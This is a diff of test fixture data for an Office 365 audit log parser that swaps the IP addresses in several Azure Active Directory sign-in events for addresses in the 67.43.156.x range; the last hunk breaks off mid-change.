@@ -1209,7 +1209,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1227,10 +1227,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:38:40", "ExtendedProperties": [ { 
@@ -1280,7 +1280,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1298,10 +1298,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:13:16",
 "ExtendedProperties": [
 {
@@ -1351,7 +1351,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1369,10 +1369,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:13:16",
 "ExtendedProperties": [
 {
@@ -1422,7 +1422,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1440,10 +1440,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T21:38:25",
 "ExtendedProperties": [
 {
@@ -1493,7 +1493,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1511,10 +1511,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-07T16:44:04",
 "ExtendedProperties": [
 {
@@ -1564,7 +1564,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1582,10 +1582,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T10:51:45",
 "ExtendedProperties": [
 {
@@ -1635,7 +1635,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
